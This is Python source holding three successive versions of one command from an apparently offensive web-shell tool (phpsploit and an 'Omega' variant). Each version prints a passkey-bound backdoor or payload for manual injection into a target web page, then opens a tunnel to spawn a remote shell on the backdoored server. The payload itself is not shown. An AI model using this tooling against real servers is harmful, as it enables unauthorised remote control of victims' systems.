def do_exploit(self, argv):
    """Spawn a shell from target server

    SYNOPSIS:
        exploit [--get-backdoor]

    DESCRIPTION:
        This command send an HTTP request to the remote server
        url (defined by the $TARGET setting).
        If $TARGET is correctly backdoored with the phpsploit
        backdoor, the request remotely executes the session opener
        in order to retrieve environment variables, and spawn the
        phpsploit remote shell.

    OPTIONS:
        --get-backdoor
            Only display current backdoor, as it should be
            injected on the current or future target url.

    NOTE: The $TARGET setting should be a valid http(s) url,
    previously infected with the phpsploit backdoor.
    """
    # NOTE(review): the docstring is laid out as user-facing help text
    # (SYNOPSIS/DESCRIPTION/OPTIONS), so its wording is left as written.

    # Render the configured stub: the %%PASSKEY%% marker is replaced with
    # the upper-cased PASSKEY setting, so the text printed below is tied to
    # this session's passkey.
    template = str(session.Conf.BACKDOOR(call=False))
    passkey = session.Conf.PASSKEY().upper()
    backdoor = template.replace("%%PASSKEY%%", passkey)

    # Any extra argument short-circuits: only `--get-backdoor` is accepted,
    # everything else is answered with the command's help.
    if len(argv) >= 2:
        if argv[1] != "--get-backdoor":
            return self.interpret("help exploit")
        print(backdoor)
        return None

    print("[*] Current backdoor is: " + backdoor + "\n")

    # A truthy `tunnel` is treated as "already connected": refuse to open
    # a second one and tell the user how to switch targets.
    if tunnel:
        notice = ("[*] Use `set TARGET <VALUE>` to use another url as target."
                  "\n[*] To exploit a new server, disconnect from «{}» first.")
        print(notice.format(session.Env.HOST))
        return None

    # No target configured: explain the manual prerequisite and stop.
    if session.Conf.TARGET() is None:
        hint = ("To run a remote tunnel, the backdoor shown above must be\n"
                "manually injected in a remote server executable web page.\n"
                "Then, use `set TARGET <BACKDOORED_URL>` and run `exploit`.")
        print(colorize("%BoldCyan", hint))
        return None

    # Failures surface as exceptions from open(); its return value is
    # deliberately not propagated in this version of the command.
    tunnel.open()
    return None
def do_exploit(self, argv):
    """Spawn a shell from target server

    SYNOPSIS:
        exploit [--get-backdoor]

    DESCRIPTION:
        Connect to remote target URL (`help set TARGET`).
        If backdoor (`exploit --get-backdoor`) is correctly
        injected in target URL, phpsploit spawns a remote shell.

    OPTIONS:
        --get-backdoor
            Display current backdoor code, as it should be
            injected on target URL.
    """
    # NOTE(review): the docstring is laid out as user-facing help text
    # (SYNOPSIS/DESCRIPTION/OPTIONS), so its wording is left as written.

    # Render the configured stub: the %%PASSKEY%% marker is replaced with
    # the upper-cased PASSKEY setting, so the text printed below is tied to
    # this session's passkey.
    template = str(session.Conf.BACKDOOR(call=False))
    passkey = session.Conf.PASSKEY().upper()
    backdoor = template.replace("%%PASSKEY%%", passkey)

    # Extra argument handling: `--get-backdoor` prints the stub and reports
    # success; anything else shows the help and reports failure.
    if len(argv) >= 2:
        if argv[1] != "--get-backdoor":
            self.interpret("help exploit")
            return False
        print(backdoor)
        return True

    print("[*] Current backdoor is: " + backdoor + "\n")

    # A truthy `tunnel` is treated as "already connected": refuse to open
    # a second one and tell the user how to switch targets.
    if tunnel:
        notice = ("[*] Use `set TARGET <VALUE>` to use another url as target."
                  "\n[*] To exploit a new server, disconnect from «{}» first.")
        print(notice.format(session.Env.HOST))
        return False

    # No target configured: explain the manual prerequisite and stop.
    if session.Conf.TARGET() is None:
        hint = ("To run a remote tunnel, the backdoor shown above must be\n"
                "manually injected in a remote server executable web page.\n"
                "Then, use `set TARGET <BACKDOORED_URL>` and run `exploit`.")
        print(colorize("%BoldCyan", hint))
        return False

    # The command's result is whatever open() returns; failures are
    # reported by open() raising rather than by a return value.
    connected = tunnel.open()
    return connected
def do_run(self, argv):
    """Spawn a shell from target server.

    USAGE:
        run

    DESCRIPTION:
        Connect to remote target URL (`help set TARGET`).
        If payload (`run --get-payload`) is correctly
        injected in target URL, Omega spawns a remote shell.

    OPTIONS:
        --get-payload
            Display current payload code, as it should be
            injected on target URL.
    """
    # NOTE(review): the USAGE line above does not list `--get-payload`
    # although OPTIONS documents it and the code below accepts it. The
    # docstring is laid out as user-facing help text, so it is left as
    # written here; confirm and fix at the source.

    # Render the configured stub: the %%PASSKEY%% marker is replaced with
    # the upper-cased PASSKEY setting, so the text printed below is tied to
    # this session's passkey.
    template = str(session.Conf.PAYLOAD(call=False))
    passkey = session.Conf.PASSKEY().upper()
    payload = template.replace("%%PASSKEY%%", passkey)

    # Extra argument handling: `--get-payload` prints the stub and reports
    # success; anything else shows the help and reports failure.
    if len(argv) >= 2:
        if argv[1] != "--get-payload":
            self.interpret("help run")
            return False
        print(payload)
        return True

    print("[*] Current payload is: " + payload + "\n")

    # A truthy `tunnel` is treated as "already connected": refuse to open
    # a second one and tell the user how to switch targets.
    if tunnel:
        notice = ("[*] Use `set TARGET <value>` to use another url as target."
                  "\n[*] To exploit a new server, disconnect from «{}» first.")
        print(notice.format(session.Env.HOST))
        return False

    # No target configured: explain the manual prerequisite and stop.
    if session.Conf.TARGET() is None:
        hint = ("To run a remote tunnel, the payload shown above must be\n"
                "manually injected in a remote server executable web page.\n"
                "Then, use `set TARGET <payloaded_url>` and run `run`.")
        print(colorize("%BoldCyan", hint))
        return False

    # The command's result is whatever open() returns; failures are
    # reported by open() raising rather than by a return value.
    connected = tunnel.open()
    return connected